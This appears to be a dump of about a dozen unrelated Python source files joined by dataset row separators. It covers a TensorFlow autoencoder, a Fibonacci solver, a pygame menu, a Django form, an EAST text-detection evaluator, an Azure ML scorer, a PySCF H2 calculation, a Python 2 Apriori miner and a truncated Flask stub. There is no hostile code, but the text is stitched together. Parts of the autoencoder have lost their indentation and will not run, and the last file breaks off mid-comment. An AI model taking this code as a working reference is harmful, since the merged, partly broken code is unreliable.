LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import tensorflow as tf
import numpy as np
from .saver import Saver
from sklearn.utils import shuffle
import os
from ..common.utils import weight_variable, bias_variable
from ..common.utils import train_test_split_, identity_tensor
import logging
import time
class FancyAutoEncoder:
def __init__(self, n_iter, hidden_layer_sizes, activations,
initial_learning_rate, solver='Adam', batch_size=32,
random_state=10, early_stopping=False, patience=10,
validation_set=None, lamda=1e-1, knob_cols=None,
auto_refit=True, max_refit_attempts=10):
"""
This is a modified version of the AutoEncoder imitating interfaces
provided by scikit-learn for unsupervised learning (fit, transform)
The main modification brought to this AutoEncoder is a new loss
function that focus on reconstructing another input. So such
an AutoEncoder will have 2 types of input:
1) It's traditional input which should be fed to the encoder layer
2) Another input which we try to approximate in the bottleneck layer.
lamda: coefficient multiplying the configuration approximation term
auto_refit: whether to autorefit if centroids are vanishing
max_refit_attempts: maximum number of attempts for refitting...
"""
if knob_cols is None:
# FIXME
pass
self.knob_cols = knob_cols
self.n_iter = n_iter
self.hidden_layer_sizes = hidden_layer_sizes
self.activations = activations
l = int(len(self.activations) / 2)
self.hidden_layer_sizes[int(
len(self.hidden_layer_sizes) / 2)] += len(self.knob_cols)
self.solver = solver
self.random_state = random_state
self.initial_learning_rate = initial_learning_rate
self._fitted = False
self.batch_size = batch_size
self.train_encodings = None
self.early_stopping = early_stopping
self.patience = patience
self.validation_set = validation_set
self.lamda = lamda #
self.centroids = None
# used to save encodings after mapping...
self.altered_centroids = None
self._last_fit_duration = None
# Number of times we're attempting to refit (because of vanishing \
# centroids)
self.refit_attempt = None
self.auto_refit = auto_refit # auto refit on failure
self.max_refit_attempts = max_refit_attempts
np.random.seed(random_state)
tf.set_random_seed(random_state)
try:
assert len(hidden_layer_sizes) % 2 == 1
self.__create_activation_map()
except AssertionError:
print("Error: the length of hidden_layer_sizes must be odd")
raise
def _compute_centroids(self, encodings, labels):
"""Computes the centroids of encodings given its labels...
! Note: centroids are indexed by job alias not by job id...
"""
counts = {}
centroids = {}
# Copy encodings to avoid ref modification when computing centroid.
encodings = encodings.copy()
for i, encoding in enumerate(encodings):
key = int(labels[i])
if key in centroids:
centroids[key] += encoding
counts[key] += 1
else:
centroids[key] = encoding
counts[key] = 1
for key in centroids:
centroids[key] /= counts[key]
self.centroids = centroids
    def fake_fit(self, nn_weights):
        """Install pre-trained weights without running any training.

        Builds the graph for the current topology and seeds the saver's best
        weights; the saver's restore_weights must still be run in a session
        before the network is usable (hence the warning below).
        """
        # assumes self.dim_Y was set by a previous real fit or externally — TODO confirm
        self._architecture = self.__build_nn_architecture(
            self.dim_Y, self.hidden_layer_sizes)
        self._placeholders, self._weights, self._biases, \
            self._outputs = self._architecture
        encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
        # The saver tracks only the encoder half of the weights plus all biases.
        self._saver = Saver(
            self._weights[:encoding_vector_index + 1] + self._biases)
        self._saver.best_params = nn_weights
        self._fitted = True
        logging.warning(
            "fake_fit has been called without calling restore_weights from saver")
    def fit(self, X, debug=False,
            centroids_strategy='all',
            X_shared=None,
            log_time=False,
            refit_attempt=0):
        """
        X: numpy array
            contains the labels as first column then configuration columns
            then observation columns
        debug: boolean, default=False
        centroid_strategy: str ('all' or 'shared')
            'all' means compute the centroids from all given configurations
            used for training the autoencoder
            'shared' means compute the centroids from X_shared
        X_shared: numpy array, default None
            Only meaningful if centroid_strategy is 'shared'.
            Same format as X
        log_time: boolean, default=False
            Whether or not to log the time to train the autoencoder.
        refit_attempt: int
            How many times we're attempting to refit again the autoencoder
            because of vanishing centroids...
        """
        self.refit_attempt = refit_attempt
        if refit_attempt > 0:
            logging.warn("Refitting autoencoder (attempt #: {})".format(
                refit_attempt))
        t0 = time.time()
        # Split X into its three column groups: label | knobs | observations.
        labels = X[:, 0]
        configurations = X[:, 1:1 + len(self.knob_cols)]
        Y = X[:, 1 + len(self.knob_cols):]
        # Keep an untouched copy: Y is rebound to a placeholder further down.
        YY = Y.copy()
        early_stopping = self.early_stopping
        patience = self.patience
        validation_set = self.validation_set
        if early_stopping:
            # Hold out the last 10% (no shuffling) as a validation split.
            config_train, config_val, Y_train, Y_val, labels_train, labels_val, _ = train_test_split_(
                configurations, Y, labels, test_size=.1, shuffle=False)
        else:
            config_train = configurations
            Y_train = Y
            labels_train = labels
        encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
        if not self._fitted:
            # First fit: build the graph and a saver over encoder weights + biases.
            self.dim_Y = np.shape(Y_train)[1]
            self._architecture = self.__build_nn_architecture(
                self.dim_Y, self.hidden_layer_sizes)
            self._placeholders, self._weights, self._biases, self._outputs = self._architecture
            self._saver = Saver(
                self._weights[:encoding_vector_index + 1] + self._biases)
            self._fitted = True
        out = self._outputs[-1]
        # The bottleneck output carries the knob approximation in its last columns.
        encoded_value = self._outputs[encoding_vector_index]
        config_approx = encoded_value[:, -len(self.knob_cols):]
        encoded_value = encoded_value[:, :-len(self.knob_cols)]
        config = self._placeholders[0]
        Y = self._placeholders[-1]
        # Loss = reconstruction MSE + lamda * knob-approximation MSE, with
        # extreme lamda values degenerating to a single term.
        mse_err = tf.reduce_mean(tf.square(Y - out))
        config_recons_mse = tf.reduce_mean(tf.square(config - config_approx))
        err = mse_err + self.lamda * config_recons_mse
        if self.lamda < 1e-9:
            err = mse_err
        elif self.lamda > 1e9:
            err = config_recons_mse
        train_step = tf.train.AdamOptimizer(
            self.initial_learning_rate).minimize(err)
        n_train = np.shape(Y_train)[0]
        self.history = {}
        self.history['loss'] = []
        self.history['val_loss'] = []
        self.log = {}
        self.log['obs_val_val'] = []
        self.log['config_recons_val'] = []
        with tf.Session() as sess:
            sess.run(tf.global_variables_initializer())
            min_err = np.inf
            best_epoch = -1
            count = 0
            n_epochs = self.n_iter
            exited_early_stopping = False
            if debug:
                first_term_initial = mse_err.eval(
                    feed_dict=self.__get_feed_dict(
                        config_train, Y_train, self._placeholders))
                second_term_initial = config_recons_mse.eval(
                    feed_dict=self.__get_feed_dict(
                        config_train, Y_train, self._placeholders))
            for e in range(n_epochs):
                # Stop once validation has not improved for `patience` epochs.
                if early_stopping and best_epoch > 0 and e > best_epoch + patience:
                    exited_early_stopping = True
                    break
                # NOTE(review): `stop` is assigned but never read.
                stop = 0
                config_shuf, Y_shuf = shuffle(
                    config_train, Y_train, random_state=self.random_state)
                n_train = len(Y_train)
                r1 = range(int(np.ceil(n_train / self.batch_size)))
                for i in r1:
                    Y_batch = Y_shuf[i *
                                     self.batch_size:(i + 1) * self.batch_size, :]
                    config_batch = config_shuf[i *
                                               self.batch_size:(i + 1) * self.batch_size, :]
                    train_step.run(feed_dict=self.__get_feed_dict(
                        config_batch, Y_batch, self._placeholders))
                loss = err.eval(feed_dict=self.__get_feed_dict(
                    config_train, Y_train, self._placeholders))
                self.history['loss'].append(loss)
                if debug:
                    mse_err_value = mse_err.eval(
                        feed_dict=self.__get_feed_dict(
                            config_train, Y_train, self._placeholders))
                    config_recons_err_value = config_recons_mse.eval(
                        feed_dict=self.__get_feed_dict(
                            config_train, Y_train, self._placeholders))
                if early_stopping:
                    val_loss = err.eval(
                        feed_dict=self.__get_feed_dict(
                            config_val, Y_val, self._placeholders))
                    self.history['val_loss'].append(val_loss)
                    if debug:
                        mse_err_value_ = mse_err.eval(
                            feed_dict=self.__get_feed_dict(
                                config_val, Y_val, self._placeholders))
                        config_recons_err_value_ = config_recons_mse.eval(
                            feed_dict=self.__get_feed_dict(
                                config_val, Y_val, self._placeholders))
                        self.log['obs_val_val'].append(mse_err_value_)
                        self.log['config_recons_val'].append(
                            config_recons_err_value_)
                    # Snapshot the weights whenever validation improves.
                    if val_loss < min_err:
                        self._saver.save_weights(sess)
                        min_err = val_loss
                        count += 1
                        best_epoch = e
            if early_stopping and exited_early_stopping:
                # Roll back to the best snapshot seen before patience ran out.
                self._saver.restore_weights(sess)
            else:
                best_epoch = -1
                self._saver.save_weights(sess)
            if debug:
                first_term_final = mse_err.eval(
                    feed_dict=self.__get_feed_dict(
                        config_train, Y_train, self._placeholders))
                second_term_final = config_recons_mse.eval(
                    feed_dict=self.__get_feed_dict(
                        config_train, Y_train, self._placeholders))
                self.optim_log = [
                    first_term_initial, second_term_initial, first_term_final,
                    second_term_final]
            # Encode the full (pre-split) training data with the final weights.
            encoded_vals = encoded_value.eval(
                session=sess, feed_dict=self.__get_feed_dict(
                    configurations, YY, self._placeholders))
            if centroids_strategy == 'all':
                self._compute_centroids(encoded_vals, labels)
            elif centroids_strategy == 'shared':
                assert X_shared is not None
                labels_shared = X_shared[:, 0]
                configurations_shared = X_shared[:, 1:1 + len(self.knob_cols)]
                Y_shared = X_shared[:, 1 + len(self.knob_cols):]
                encoded_vals_shared = encoded_value.eval(
                    session=sess, feed_dict=self.__get_feed_dict(
                        configurations_shared, Y_shared, self._placeholders))
                self._compute_centroids(encoded_vals_shared, labels_shared)
            else:
                raise NotImplementedError
        # Count near-zero centroids; more than one means the encoder collapsed.
        count_zeros = 0
        for key in self.centroids:
            if np.sum(np.abs(self.centroids[key])) < 1e-10:
                count_zeros += 1
        if count_zeros > 1 and self.auto_refit and(
                refit_attempt + 1) < self.max_refit_attempts:
            # Retrain from scratch (bounded by max_refit_attempts).
            self._fitted = False
            return self.fit(
                X, debug=debug, centroids_strategy=centroids_strategy,
                X_shared=X_shared, log_time=log_time,
                refit_attempt=refit_attempt + 1)
        elif count_zeros > 1 and self.auto_refit:
            logging.warn("Attempted to refit the autoencoder {} times with vanishing centroids...".format(
                self.max_refit_attempts))
        t_end = time.time()
        fitting_time = t_end - t0
        self._last_fit_duration = fitting_time
        if log_time:
            logging.info(
                "[AE fitting time]: {} minutes and {} seconds".format(
                    fitting_time // 60,
                    int(fitting_time % 60)))
        if debug:
            return encoded_vals, best_epoch
        return encoded_vals
def transform(self, X):
configs = X[:, 1:1 + len(self.knob_cols)]
if np.ndim(X) > 1:
Y = X[:, 1 + len(self.knob_cols):]
else:
aux = np.shape(X[1 + len(self.knob_cols):])[0]
Y = np.reshape(X[1 + len(self.knob_cols):], [1, aux])
try:
assert self._fitted == True
encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
out = self._outputs[-1]
encoded_value = self._outputs[encoding_vector_index][
:, : -len(self.knob_cols)]
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
self._saver.restore_weights(sess)
dico = self.__get_feed_dict(configs, Y, self._placeholders)
encodings = encoded_value.eval(session=sess, feed_dict=dico)
# print(np.shape(encodings))
except AssertionError:
print("Error: needs to call fit before transform can be invoked")
raise
return encodings
def __create_activation_map(self):
self._activ_func = {}
self._activ_func['relu'] = tf.nn.relu
self._activ_func['sigmoid'] = tf.nn.sigmoid
self._activ_func['tanh'] = tf.nn.tanh
self._activ_func[None] = identity_tensor
self._activ_func[''] = identity_tensor
self._activ_func['linear'] = identity_tensor
def __get_feed_dict(self, config, Y, placeholders):
config_pl = placeholders[0]
Y_true = placeholders[-1]
feed_dict = {config_pl: config, Y_true: Y}
return feed_dict
    def __make_fc_layers(
            self, Y, dim_Y, hidden_dimensions, activations, trainable):
        """
        Creates the weights, biases and outputs of the autoencoder with
        tied weights option.

        The decoder half (layers past the middle index) reuses the
        transposed encoder weights instead of fresh variables, so only
        fresh biases are created there.

        Args:
            Y: input placeholder/tensor of shape [None, dim_Y].
            dim_Y: dimensionality of the metric vector.
            hidden_dimensions: widths of all hidden layers (encoder,
                bottleneck, decoder); the output layer of width dim_Y is
                appended internally.
            activations: activation names, resolved via self._activ_func.
            trainable: per-layer trainability flags.

        Returns:
            (weights, biases, outputs) lists, one entry per layer.
        """
        size = len(hidden_dimensions)
        encoding_vector_index = int(len(hidden_dimensions) / 2)
        dimensions = hidden_dimensions + [dim_Y]
        # Copy before resolving names so the caller's list is untouched.
        activations = activations.copy()
        for i in range(len(activations)):
            activations[i] = self._activ_func[activations[i]]
        weights = []
        biases = []
        outputs = []
        for i in range(len(dimensions)):
            if i == 0:
                # NOTE(review): r looks like a Xavier/Glorot bound but is
                # never used -- weight_variable is given init_std instead.
                r = 4 * np.sqrt(6 / (dim_Y + dimensions[i]))
                Wi = weight_variable(
                    [dim_Y, dimensions[i]],
                    trainable=trainable[i],
                    init_std=0.1)
                bi = bias_variable(
                    [dimensions[i]], trainable=trainable[i], init=0.1)
                # NOTE(review): no activation is applied to the first
                # layer's output -- confirm this is intentional.
                oi = tf.matmul(Y, Wi) + bi
            elif i <= encoding_vector_index:
                # Encoder side: fresh weights per layer.
                r = 4 * np.sqrt(6 / (dimensions[i - 1] + dimensions[i]))
                Wi = weight_variable(
                    [dimensions[i - 1],
                     dimensions[i]],
                    trainable=trainable[i],
                    init_std=0.1)
                bi = bias_variable(
                    [dimensions[i]], trainable=trainable[i], init=0.1)
                oi = tf.matmul(outputs[-1], Wi) + bi
                oi = activations[i](oi)
            elif i > encoding_vector_index:
                # Decoder side: mirror the encoder weight (transposed).
                Wi = tf.transpose(weights[size - i]) # tied weights
                bi = bias_variable(
                    [dimensions[i]], trainable=trainable[i], init=0.1)
                oi = tf.matmul(outputs[-1], Wi) + bi
                oi = activations[i](oi)
            weights.append(Wi)
            biases.append(bi)
            outputs.append(oi)
        return weights, biases, outputs
def __build_nn_architecture(self, dim_Y, hidden_dimensions):
"""
Builds the autoencoder architecture given topology description
"""
Y = tf.placeholder(tf.float32, shape=[None, dim_Y])
config = tf.placeholder(tf.float32, shape=[None, len(self.knob_cols)])
placeholders = [config, Y]
weights, biases, outputs = self.__make_fc_layers(
Y, dim_Y, hidden_dimensions, self.activations, trainable=[True] *
(len(hidden_dimensions) + 1))
architecture = [placeholders, weights, biases, outputs]
return architecture
def get_encodings(self, labels):
"""
Returns encodings given a set of labels (aliases or job ids) after
calculating the centroids computed for each job (by averaging over
its job traces encodings)
"""
if self.centroids is not None:
encodings = list(
map(lambda x: self.centroids[int(x)], list(labels)))
encodings = np.asarray(encodings)
return encodings
return None
def get_reconstruction(self, X, y=None):
if np.ndim(X) > 1:
Y = X[:, 1 + len(self.knob_cols):]
else:
aux = np.shape(X[1 + len(self.knob_cols):])[0]
Y = np.reshape(X[1 + len(self.knob_cols):], [1, aux])
n = len(Y)
fake_config = np.zeros([n, len(self.knob_cols)])
try:
assert self._fitted == True
out = self._outputs[-1]
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
self._saver.restore_weights(sess)
dico = self.__get_feed_dict(fake_config, Y, self._placeholders)
reconstruction = out.eval(session=sess, feed_dict=dico)
return reconstruction
except AssertionError:
print("Error: needs to call fit before transform can be invoked")
raise
def serialize(self, filepath):
recons_info = self.get_persist_info()
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
np.save(filepath, recons_info)
    def persist(self, filepath):
        # Alias kept for API compatibility: persisting is just serializing.
        self.serialize(filepath)
def get_persist_info(self):
recons_info = {'best_params': self._saver.best_params,
'hidden_layer_sizes': self.hidden_layer_sizes,
'dim_Y': self.dim_Y, 'centroids': self.centroids,
'_last_fit_duration': self._last_fit_duration,
'altered_centroids': self.altered_centroids,
'refit_attempt': self.refit_attempt,
'auto_refit': self.auto_refit,
'max_refit_attempts': self.max_refit_attempts}
return recons_info
def load(self, filepath):
recons_info = np.load(filepath, allow_pickle=True)[()]
nn_weights = recons_info['best_params']
self.hidden_layer_sizes = recons_info['hidden_layer_sizes']
self.dim_Y = recons_info['dim_Y']
self.centroids = recons_info['centroids']
self.altered_centroids = recons_info['altered_centroids']
self._last_fit_duration = recons_info['_last_fit_duration']
self.max_refit_attempts = recons_info['max_refit_attempts']
self.fake_fit(nn_weights)
def load_(self, recons_info):
nn_weights = recons_info['best_params']
self.hidden_layer_sizes = recons_info['hidden_layer_sizes']
self.dim_Y = recons_info['dim_Y']
self.centroids = recons_info['centroids']
self.altered_centroids = recons_info['altered_centroids']
self._last_fit_duration = recons_info['_last_fit_duration']
self.max_refit_attempts = recons_info['max_refit_attempts']
self.auto_refit = recons_info['auto_refit']
self.fake_fit(nn_weights)
@staticmethod
def build(
n_iter=500, encoding_dim=3, depth=2, nh=20, activation='linear',
initial_learning_rate=1e-3, solver='Adam', batch_size=32,
random_state=10, early_stopping=False, patience=10, lamda=1e-1,
knob_cols=None, auto_refit=True, max_refit_attempts=10):
"""
Provides another interface (other than the constructor) for
constructing autoencoder objects...
"""
assert knob_cols is not None
encoder_hidden_layers = [int(nh / (2**i)) for i in range(depth - 1)]
if len(encoder_hidden_layers) > 0:
if 0 in encoder_hidden_layers or encoder_hidden_layers[-1] < encoding_dim:
return None
decoder_hidden_layers = encoder_hidden_layers[::-1]
hidden_layer_sizes = encoder_hidden_layers + \
[encoding_dim] + decoder_hidden_layers
activations = [activation] * 2 * depth
ae = FancyAutoEncoder(
n_iter, hidden_layer_sizes, activations, initial_learning_rate,
solver=solver, batch_size=batch_size, random_state=random_state,
early_stopping=early_stopping, patience=patience, lamda=lamda,
knob_cols=knob_cols, auto_refit=auto_refit,
max_refit_attempts=max_refit_attempts)
return ae
@staticmethod
def valid_params(ae_params, encoding_size, n_knob_cols):
"""
TODO: recheck if I can even improve further this function...
or double check if the params can be provided in a different way?!
"""
nh = ae_params['nh']
depth = ae_params['depth']
if depth >= 2:
return (nh / (2**(depth - 2))) > n_knob_cols + encoding_size
return True
|
998,124 | 243461e7b70a633bf2ae431b294c99df121d95ea | a=int(input())
# Parse the space-separated integers from the second stdin line.
x= [int(n) for n in input().split()]
def median(x):
    """Return the integer median of a non-empty sequence of ints.

    Odd length: the middle element.  Even length: the floor of the
    average of the two middle elements.

    BUG FIX: sorted() is used instead of list.sort() so the caller's list
    is no longer mutated as a side effect.
    """
    ordered = sorted(x)
    mid = len(ordered) // 2
    # ordered[~mid] mirrors the index from the end; for odd lengths it is
    # the same element as ordered[mid].
    return (ordered[mid] + ordered[~mid]) // 2
# Compute and print the integer median of the parsed input list.
s1=median(x)
print(s1)
|
998,125 | d03d8477dccbdec4c8787dab1fff0f4b8e918987 | import pygame
from game import Game
import os
start_btn = pygame.image.load(os.path.join('menu', 'button_play.png'))
logo = pygame.image.load('logo.png')
class MainMenu:
    """Start-up screen: background, logo and a play button that launches
    the game when clicked."""

    def __init__(self):
        self.width = 1250
        self.height = 700
        self.win = pygame.display.set_mode((self.width, self.height))
        self.bg = pygame.image.load(os.path.join('game_assets', 'bg.png'))
        self.bg = pygame.transform.scale(self.bg, (self.width, self.height))
        # (x, y, w, h) of the play button, horizontally centred at y=350.
        self.btn = (self.width / 2 - start_btn.get_width() / 2, 350,
                    start_btn.get_width(), start_btn.get_height())

    def __run__(self):
        """Event loop: redraw every frame, start a Game on button click."""
        running = True
        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                elif event.type == pygame.MOUSEBUTTONDOWN:
                    mx, my = pygame.mouse.get_pos()
                    bx, by, bw, bh = self.btn
                    if bx <= mx <= bx + bw and by <= my <= by + bh:
                        game = Game(self.win)
                        game.wave = 0
                        game.current_wave = [20, 0, 0][:]
                        game.__run__()
            self.draw(self.win)
        pygame.quit()

    def draw(self, win):
        """Blit background, logo and play button, then update the display."""
        self.win.blit(self.bg, (0, 0))
        self.win.blit(logo, (self.width / 2 - logo.get_width() / 2, 0))
        self.win.blit(start_btn, (self.btn[0], self.btn[1]))
        pygame.display.update()
|
998,126 | d11beb2dc14ad353b42cabd46eef3ce4619f5570 | from django.core import validators
from django import forms
from django.db.models import fields
from django.forms import widgets
from .models import Student
class StudentRegistration(forms.ModelForm):
    """ModelForm exposing name/email/password for Student sign-up."""
    class Meta:
        model = Student
        fields = ('name', 'email', 'password') #We can use list as well
        # Bootstrap styling; render_value=True keeps the password field
        # populated when the form is re-rendered after a validation error.
        widgets = {
            'name':forms.TextInput(attrs={'class': 'form-control'}),
            'email':forms.EmailInput(attrs={'class': 'form-control'}),
            'password':forms.PasswordInput(render_value = True, attrs={'class': 'form-control'}),
        } |
998,127 | a12206b7bbbf61147507c844977c4b09240e21ae | import time
import torch
import subprocess
import os
from model import EAST
from model2 import EASTER
from detect import detect_dataset
import numpy as np
import shutil
def eval_model(model_path, test_img_path, submit_path='./submit', save_flag=True, set_scale=4, model='EAST', limit=False):
    """
    Run text-detection inference over a test set and score it with the
    ICDAR evaluation script.

    Args:
        model_path: path of the .pth checkpoint to load.
        test_img_path: directory of test images.
        submit_path: working directory for per-image result .txt files.
        save_flag: keep the submit directory after scoring when True.
        set_scale: output scale passed to detect_dataset().
        model: 'EAST' selects the EAST architecture, anything else EASTER.
        limit: forwarded to detect_dataset() to cap the number of images.

    Returns:
        The textual output of the ICDAR evaluation script.
    """
    # Start from an empty submission directory.
    if os.path.exists(submit_path):
        shutil.rmtree(submit_path)
    os.mkdir(submit_path)
    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    print ('Picked Device')
    print (device)
    if (model == 'EAST'):
        model = EAST(False).to(device)
    else:
        model = EASTER(False).to(device)
    scale = set_scale
    model.load_state_dict(torch.load(model_path, map_location=device))
    model.eval()
    start_time = time.time()
    detect_dataset(model, device, test_img_path, submit_path, scale=scale, limit_images=limit)
    os.chdir(submit_path)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # BUG FIX: the original command used Unicode en dashes ('–g', '–s'),
    # which the evaluation script does not recognise as option prefixes.
    res = subprocess.getoutput('python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time()-start_time))
    if not save_flag:
        shutil.rmtree(submit_path)
    return res
if __name__ == '__main__':
    #model_name = './pths/east_vgg16.pth'
    # Evaluate the EASTER checkpoint at scale 2 on the ICDAR-2015 test set.
    model_name = './pths/EASTER-sm1-aug3-no_ignore-375.pth'
    test_img_path = os.path.abspath('/home/surajm72/data/ICDAR_2015/test_img')
    submit_path = './submit'
    scale = 2
    model = 'EASTER'
    eval_model(model_name, test_img_path, submit_path, set_scale=scale, model=model)
|
998,128 | 96351f36468876e8fe5e433357c95ee9b283c265 | def get_fibonacci_last_digit(n):
    # Last digit of F(n), computed iteratively mod 10 (F(0)=0, F(1)=1).
    if (n < 1):
        return n
    prev = 0
    curr = 1
    for _ in range(n - 1):
        prev, curr = curr % 10, (prev + curr) % 10
    return curr % 10
def get_fibonacci_sum(n):
    # Sum of F(0..n) equals F(n+2) - 1; last digits of Fibonacci numbers
    # repeat with Pisano period 60 mod 10, so reduce the index mod 60.
    last_digit = get_fibonacci_last_digit((n + 2) % 60)
    # Subtract 1 in the last-digit domain, borrowing 10 when needed.
    sum_last_digit = get_last_digit_after_subtraction(last_digit, 1)
    return sum_last_digit
def get_fibonacci_partial_sum(a, b):
    # Last digit of F(a)+...+F(b) = (sum F(0..b) - sum F(0..a-1)) mod 10.
    last_digit_partial_sum = get_last_digit_after_subtraction(get_fibonacci_sum(b), get_fibonacci_sum(a - 1))
    return last_digit_partial_sum
def get_last_digit_after_subtraction(last_digit_minuend, last_digit_subtrahend):
    """Last digit of (minuend - subtrahend), borrowing 10 when negative."""
    diff = last_digit_minuend - last_digit_subtrahend
    return diff + 10 if diff < 0 else diff
if __name__ == '__main__':
    # Read "a b" from stdin and print the last digit of F(a)+...+F(b).
    a, b = map(int, input().split())
    print(get_fibonacci_partial_sum(a, b))
|
998,129 | 90e4336b9f271c410edc63189503e7bedb6a164d | #Ibrahim Kamal
#ik363
#Ball class to draw the ball
from Drawable import Drawable
import pygame
class Ball(Drawable):
    """A drawable filled circle with a centre location, color and radius."""
    def __init__(self , location , color , radius , visibility):
        super().__init__(visibility) #visibility boolean of ball
        self.location = location #(x, y) centre of ball
        self.color = color #color of ball
        self.radius = radius #radius of ball
    def draw(self , surface):
        #draw the ball only when its visibility flag is set
        if self.visibility:
            pygame.draw.circle(surface , self.color , (round(self.location[0]) , round(self.location[1])) , self.radius)
    def get_rect(self):
        #bounding square of side 2*radius centred on the ball's location
        self.rect = pygame.Rect(self.location[0]-self.radius , self.location[1]-self.radius , self.radius*2 , self.radius*2)
        return self.rect |
998,130 | 9f05528974185ab74758a3f49b3f642580b9b068 | import json
import numpy as np
from fastai.text import *
from azureml.core.model import Model
import logging
logging.basicConfig(level=logging.DEBUG)
def init():
    # Called once by the Azure ML serving runtime: resolve the registered
    # 'sa_classifier' model and load the fastai learner into a global.
    global model
    model_path = Model.get_model_path('sa_classifier')
    model_path = os.path.split(model_path)  # (directory, filename)
    model = load_learner(path=model_path[0], file =model_path[1])
def run(data):
    # Score one request with the globally loaded learner and return a JSON
    # document with the predicted sentiment and its likelihood.
    try:
        result = model.predict(data)
        # result is a fastai prediction triple; presumably index 0 is the
        # class label and index 2 the probabilities -- verify on the model.
        output = json.dumps({'sentiment':str(result[0]),
                             'likelihood':str(result[2])
                             }
                            )
        return output
    except Exception as e:
        # NOTE(review): returning the error text as the scoring result
        # hides failures from the service; consider logging/re-raising.
        error = str(e)
        return error |
998,131 | afbcff4f0accfe775ef91c55864960e307825488 |
from townsquare import db, app, manager
# Bind the shared SQLAlchemy instance to the Flask app, then hand control
# to the Flask-Script manager when executed directly.
db.init_app(app)
if __name__ == '__main__':
    manager.run() |
998,132 | 0af9eb188dc4d963651e2960b95cf3428baec82f | from pyscf import gto, scf, ao2mo
import numpy as np
# H2 molecule at the experimental bond length (0.7414 A), minimal STO-3G.
mol = gto.M(atom='H 0 0 0; H 0 0 0.7414', basis='sto3g')
mol.build()
# Restricted Hartree-Fock; kernel() returns the converged SCF energy.
mf = scf.RHF(mol)
ehf = mf.kernel()
# One-electron (core) Hamiltonian in the AO basis.
hij = mf.get_hcore()
print(hij)
print("Mo coeff: " + str(mf.mo_coeff))
# Transform the core Hamiltonian to the MO basis: C^T h C.
mohij = np.dot(np.dot(mf.mo_coeff.T, hij), mf.mo_coeff)
print(mohij)
print("Orbitals energies %s" % mf.mo_energy)
# Overlap / Coulomb-exchange matrices (results currently discarded).
mf.get_ovlp()
mf.get_jk()
mf.get_k()
# norbs = mo_coeff.shape[0]
# eri = ao2mo.incore.full(mf._eri, mo_coeff, compact=False)
# mohijkl = eri.reshape(norbs, norbs, norbs, norbs)
#enuke = gto.mole.energy_nuc(mol) # Nuclear repulsion energy
#print(enuke)
|
998,133 | f7defb9a743d98a098d38e39f5a42fed6aa919e1 | # 导入pygame包
import pygame
# Initialise all pygame modules.
pygame.init()
# Game code would go here.
print("游戏的代码。。。")
# Shut pygame down and release its resources.
pygame.quit() |
998,134 | 8243f2b6777c3fb6917dedcba210116d5737deea |
import matplotlib.pyplot as plt
from _3 import RandomWalk
# Generate one random walk and render its points as a scatter plot.
rw = RandomWalk()
rw.fill_walk()
plt.scatter(rw.x_values, rw.y_values, s=15)
plt.show()
|
998,135 | 318e193079c933e6b9523adf05f701b242085ca4 | # -*- coding: cp936 -*-
import copy
#D=[['A','B','C','D'],
# ['B','C','E'],
# ['A','B','C','E'],
# ['B','D','E'],
# ['A','B','C','D']
# ]
D=[['I1','I2','I5'],
['I2','I4'],
['I2','I3'],
['I1','I2','I4'],
['I1','I3'],
['I2','I3'],
['I1','I3'],
['I1','I2','I3','I5'],
['I1','I2','I3']
]
L = []
for T in D:
print T
print
# Find frequent 1-itemsets with a single scan of the database
def find_frequent_1_itemsets(D):
    """Single scan of transaction database D: count every item and keep
    those with support count >= 2, each wrapped as a 1-element itemset."""
    counts = {}
    for transaction in D:
        for item in transaction:
            counts[item] = counts.get(item, 0) + 1
    return [[item] for item, cnt in counts.items() if cnt >= 2]
# Join step: merge two (k-1)-itemsets into a candidate k-itemset
def comb(arr1,arr2):
    """Union of the two item lists with duplicates removed (dict-keyed)."""
    return dict.fromkeys(arr1 + arr2).keys()
# Generate candidate itemsets one item larger than those in L
def apriori_gen(L):
    """Candidate generation: join pairs of frequent k-itemsets into
    (k+1)-item candidates, pruning any candidate with an infrequent
    k-subset.  Duplicates are removed by keying on the joined string."""
    candidates = {}
    for left in L:
        for right in L:
            merged = comb(left, right)
            # Only keep genuine (k+1)-item joins.
            if len(merged) != len(right) + 1:
                continue
            merged.sort()
            if has_infrequent_subset(merged, L):
                continue
            key = "".join(merged)
            if key not in candidates:
                candidates[key] = merged
    return candidates.values()
def subset(c,l):
    """True when every element of candidate c appears in transaction l."""
    return all(elem in l for elem in c)
# Prune step: discard candidates having an infrequent (k-1)-subset
def has_infrequent_subset(c,preL):
    """True if any (len(c)-1)-subset of candidate c is absent from the
    previous level's frequent itemsets preL (Apriori pruning)."""
    for value in c:
        reduced = list(c)
        reduced.remove(value)
        if reduced not in preL:
            return True
    return False
# Main Apriori loop (Python 2): grow frequent itemsets level by level
# until a level comes back empty.
L.append(find_frequent_1_itemsets(D))
print "第1 次项频繁项集:"
print L[0]
i=0
s=""
while len(L[i])!=0:
    L.append([])
    C = apriori_gen(L[i])
    print "第",i+2,"次项候选项集:"
    print C
    CMap = {}
    CMapCnt = {}
    # Counting: one full database scan per candidate level.
    for T in D:
        for item in C:
            if subset(item,T):
                key=s.join(item)
                if CMap.has_key(key):
                    CMapCnt[key] +=1
                else:
                    CMap[key]=item
                    CMapCnt[key]=1
    # Keep candidates whose support count reaches the threshold (2).
    for k in [k for k,v in CMapCnt.items() if v>=2]:
        L[i+1].append(CMap[k])
    i+=1
    print "第",i+1,"次项频繁项集:"
    print L[i]
998,136 | e93baca7a39b345f15bd7c15f0ecd2bf5311fc92 | from flask import Flask, jsonify
import json
from tasks import connect
app = Flask(__name__)
# Swedish pronoun-count template; 'alltweets' would hold the total number
# of tweets.  NOTE(review): this dict is not referenced by the routes
